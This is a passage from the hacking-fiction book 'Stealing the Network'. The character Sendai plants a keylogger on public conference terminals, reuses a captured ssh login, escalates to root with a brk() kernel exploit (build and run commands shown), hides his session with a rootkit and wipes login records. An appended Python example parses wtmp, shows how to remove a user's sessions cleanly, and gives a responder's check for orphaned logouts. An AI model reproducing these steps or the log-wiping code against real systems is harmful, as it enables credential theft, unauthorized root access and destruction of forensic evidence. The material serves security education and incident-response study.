Throwaway Account

Sendai decides to venture outside after all these days writing Shrax. Perhaps a day at the theatre, on the beach, or attending a game would be good for him. Instead, Sendai heads for the annual ASR Cryptography Conference. He cannot afford the presentations, but hopes to gain free schwag at the giant expo. He won a Sharp Zaurus PDA the last time, which is wonderful for warwalking to find open WAPs. Sendai brings it along in case they have wireless access at the conference.

Although ASR does offer free wireless connectivity, they attempt to secure it with 802.1X and PEAP authentication. That major hassle causes lines at the free wired terminals. Although Sendai would have checked his mail over ssh (after verifying the server's ssh key) from his Zaurus, he certainly will not do so from the terminal pavilion. Even if he trusted the ASR organizers (which he does not), the terminals are totally exposed for any hacker to plug in a keylogger or defeat the software and install a program to do the same. In that instant, Sendai's expression turns from outrage to a mischievous grin as he recognizes this as a source of throwaway accounts!

The next morning, Sendai arrives early at ASR to beat the crowds. He takes an available terminal and loads Slashdot. Feigning frustration, he turns to the back of the machine and unplugs the PS/2 keyboard cable. He blows on the PS/2 port behind the machine, while his hands are inconspicuously slipping the KeyGhost SX onto the cable. This tiny device stores up to two million keystrokes and supposedly even encrypts them so that other troublemakers at ASR cannot steal the passwords. [5] Sendai plugs the keyboard cable back in with his little addition, turns back to the front, and resumes web surfing. He smiles to complete his little act that the machine had been broken and is now working again. Darn those dusty keyboard ports! Nobody paid the least attention to him during his charade and he could have been far more blatant without attracting any attention, but it never hurts to be careful. Plus it makes him feel sneaky and clever.

Figure: Attaching the KeyGhost to the terminal keyboard cable

Sendai spends the next few hours at the expo collecting T-shirts, software CDs, pens, a pair of boxer shorts, an NSA pin and bag, magazines, and a bunch of candy treats. After a series of recent Internet worms, many vendors apparently decided that worm-themed giveaways would be clever and unique. Sendai was stuck with gummy worms, refrigerator magnet worms, and a keychain worm. He is tempted to watch the terminals from nearby to ensure nobody steals his $200 KeyGhost. Then he realizes that even if he watches someone discover and take it, he cannot risk a scene by approaching and yelling "Hey! That's my keylogger!" Sendai leaves for a long lunch and then spends a couple of hours browsing at a nearby computer superstore.

Late in the afternoon, Sendai returns to ASR, hoping the keylogger remains undetected. He breathes a sigh of relief when it is right where he left it. The terminal is open, so Sendai simply repeats his broken system act and 10 minutes later is driving home with all the evidence in his pocket.

At home, Sendai quickly plugs the KeyGhost into his system to check the booty. Sendai opens up the vi editor and types his passphrase. Upon recognizing this code, the KeyGhost takes over and types a menu. Sendai types 1 for entire download and watches as pages and pages of text fill the screen. Scrolling through, he sees that the vast majority of users do little more than surf the web. Security sites such as securityfocus.com, packetstormsecurity.nl, securiteam.com, and phrack.org are popular. Many folks made the mistake of checking their Hotmail or Yahoo webmail from the terminals. Sendai has little interest in such accounts. There are also a surprising number of porn sites. No purchases with typed credit card numbers, unfortunately. Search engine queries are interesting. One user searched for "windows source torrent", another for "lsass.exe", and someone else seeks "security jobs iraq".

Figure: Downloading the KeyGhost logs

Sendai starts to worry when he passes over half the file without a single remote login. The few people who open terminal sessions only execute simple commands like ls and cat /etc/passwd. Seventy percent into the file, Sendai discovers promising data: a user logged in as antonio via ssh to psyche.ncrack.com. Sendai scans through the following commands, hoping the user will run su and type the password to become the root superuser. There is no such luck: Antonio simply reads his e-mail with mutt, sends a note to a coworker describing the conference, then disconnects. In all the excitement of reading keystroke logs, Sendai almost forgets to erase the KeyGhost and remove it from his system. If he were to be convicted later based on evidence from his own keylogger, Sendai would be the laughing stock of the criminal hacker community. Such a gaffe reminds him of all the hackers who have been caught based on evidence logged from the packet sniffer they installed on a compromised box.

The keystroke logs contain no further remote system passwords, so Sendai tries to make the most of psyche.ncrack.com. He moves to the laptop (which is still associated with the linksys WAP) and successfully logs in to Psyche. Now the pressure is on, as he must move fast to avoid detection. His first action is to run the w command to see who else is online. He is relieved that the real antonio is not online, but two other users are. Hopefully they do not notice this suspicious antonio login from an unusual IP address. An attempt by them to chat with the imposter antonio could be a disaster as well. Feeling vulnerable and exposed, Sendai focuses on the task at hand. He runs uname -a to determine that Psyche is running the Linux 2.4.20 kernel. The distribution is Red Hat 9 according to /etc/redhat-release. Sendai immediately thinks of the brk() kernel exploit for kernels up to 2.4.22. That bug was unknown to the public until it was used to compromise many Debian Project machines. Sendai was a little miffed that he had not been in on it during that pre-publication 0-day period. It is a very interesting bug, and Sendai had spent two days massaging assembly code into a working exploit. It is about to come in handy. He uploads hd-brk.asm and types:

    psyche> nasm -f elf -o hd-brk.o hd-brk.asm
    psyche> ld -o hd-brk hd-brk.o -Ttext 0xa0000000
    psyche> ./hd-brk
    # id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    #

Despite the hundreds of boxes that Sendai has compromised in his lifetime (legally or not), he never fails to feel a joyful rush of triumph when he first sees that glorious hash prompt signifying root access! But this is still only a minor victory, as the purpose of Psyche is simply to cover Sendai's tracks. There would be no time for celebration even if it were warranted, as there is now a suspicious root shell that other users might notice.

Sendai turns his attention to rootkit installation. The command lsmod shows that the kernel allows modules and that almost 50 of them are installed. This is typical for kernels from major Linux distributions. Sendai injects Shrax into the parport_pc module which, as the name implies, handles PC parallel ports. It is loaded early and unlikely to be changed, meeting the two most desirable attributes. It is also easy to remove and then re-insert the parallel port module without attracting attention. Sendai does so.

With the rootkit seemingly installed, Sendai tests his power. He issues the Shrax hideall command against the sshd process through which he is connected. Suddenly that sshd and all of its descendants (including his root shell) are hidden from system process lists. Their syslog messages are ignored and their sockets are concealed. Sendai wipes the relevant wtmp, lastlog, and syslog records to remove any trace that antonio logged on this evening. He checks up on the other two logged-in users with the TTY sniffer to ensure that they are doing their own thing and not suspecting that anything is amiss. Sendai lightly tests a few complex system components including the compiler gcc and emacs. One of the most common ways attackers are discovered is that they inadvertently break something. The generally attentive Debian folks did not notice intruders until kernel crashes began occurring on several boxes at once. Sendai is glad that no problems have yet appeared with Shrax. A feeling of relief rolls over him as he can now relax. His activities on the system are well hidden now that Psyche is securely 0wn3d.
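What Sendai does to wtmp deserves a closer look, because sloppy log cleaning is one of the places intruders get caught. The following is an added example, not code from the book and no part of the fictional Shrax: a Python parser for the struct utmp layout glibc uses on x86 (the /var/log/wtmp format of a Red Hat 9 system), a naive and a careful record wiper, and the check a responder would run over the result. The function names are this example's own, and the four records it works on are constructed inline rather than taken from any real machine.

```python
import struct

# struct utmp as glibc lays it out on x86 (the format of /var/log/wtmp on a
# Red Hat 9 box): 384 bytes per record, little-endian, with two bytes of
# padding after the 16-bit ut_type. Assumed layout; verify with struct.calcsize.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
INIT_PROCESS, LOGIN_PROCESS, USER_PROCESS, DEAD_PROCESS = 5, 6, 7, 8
SESSION_OPENERS = {INIT_PROCESS, LOGIN_PROCESS, USER_PROCESS}


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def make_record(ut_type, pid, line, user, host, ts):
    """Build one wtmp record; used here only to construct the sample input."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), line[-4:].encode(),
                       user.encode(), host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)


# Constructed sample: two ssh logins and their logouts. Logout records are
# written with ut_user empty, which is what sshd and glibc's logout() do.
SAMPLE_WTMP = b"".join([
    make_record(USER_PROCESS, 1001, "pts/0", "alice",   "10.0.0.5",       1076000000),
    make_record(USER_PROCESS, 1002, "pts/1", "antonio", "asr-terminal-7", 1076000100),
    make_record(DEAD_PROCESS, 1002, "pts/1", "",        "",               1076000900),
    make_record(DEAD_PROCESS, 1001, "pts/0", "",        "",               1076003600),
])


def parse_wtmp(data):
    """Decode a wtmp byte string into a list of dicts, oldest record first."""
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length is not a multiple of %d bytes" % UTMP_SIZE)
    recs = []
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        recs.append({"type": f[0], "pid": f[1], "line": _cstr(f[2]),
                     "user": _cstr(f[4]), "host": _cstr(f[5]), "time": f[9]})
    return recs


def _chunks(data):
    return [data[o:o + UTMP_SIZE] for o in range(0, len(data), UTMP_SIZE)]


def wipe_by_user(data, user):
    """The naive cleaner: drop every record whose ut_user matches. Logout
    records carry an empty ut_user, so the user's DEAD_PROCESS entries stay."""
    return b"".join(c for c, r in zip(_chunks(data), parse_wtmp(data))
                    if r["user"] != user)


def wipe_session(data, user):
    """A careful cleaner: drop the user's logins and the DEAD_PROCESS record
    that closes each one, matched on (pid, line)."""
    doomed, keep = set(), []
    for chunk, r in zip(_chunks(data), parse_wtmp(data)):
        key = (r["pid"], r["line"])
        if r["type"] == USER_PROCESS and r["user"] == user:
            doomed.add(key)
        elif r["type"] == DEAD_PROCESS and key in doomed:
            doomed.discard(key)
        else:
            keep.append(chunk)
    return b"".join(keep)


def orphaned_logouts(records):
    """Responder's check: DEAD_PROCESS records with no earlier session-opening
    record on the same (pid, line). An intact file has none; a username-based
    wipe leaves exactly these behind."""
    open_sessions, orphans = set(), []
    for r in records:
        key = (r["pid"], r["line"])
        if r["type"] in SESSION_OPENERS:
            open_sessions.add(key)
        elif r["type"] == DEAD_PROCESS:
            if key in open_sessions:
                open_sessions.discard(key)
            else:
                orphans.append(r)
    return orphans


if __name__ == "__main__":
    cleaned = wipe_by_user(SAMPLE_WTMP, "antonio")
    for r in orphaned_logouts(parse_wtmp(cleaned)):
        print("orphaned logout: pid=%d line=%s time=%d" % (r["pid"], r["line"], r["time"]))
```

Against a live system, parse_wtmp(open("/var/log/wtmp", "rb").read()) gives the same view that the last command prints. The point of orphaned_logouts() is the failure mode: a cleaner that matches only on username leaves a logout whose login has vanished, which is the kind of inconsistency a responder looks for first. The careful wiper defeats this one check, so wtmp is cross-checked against lastlog, the sshd lines in syslog and, when the site has them, logs shipped to another host. Expect a few benign orphans at the start of a file that logrotate rotated while sessions were open.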

[5] The KeyGhost is only one of many such products easily available over the Internet. The KEYKatcher is another popular choice.




Stealing the Network: How to Own a Continent
ISBN: 1931836051
Year: 2004
Pages: 105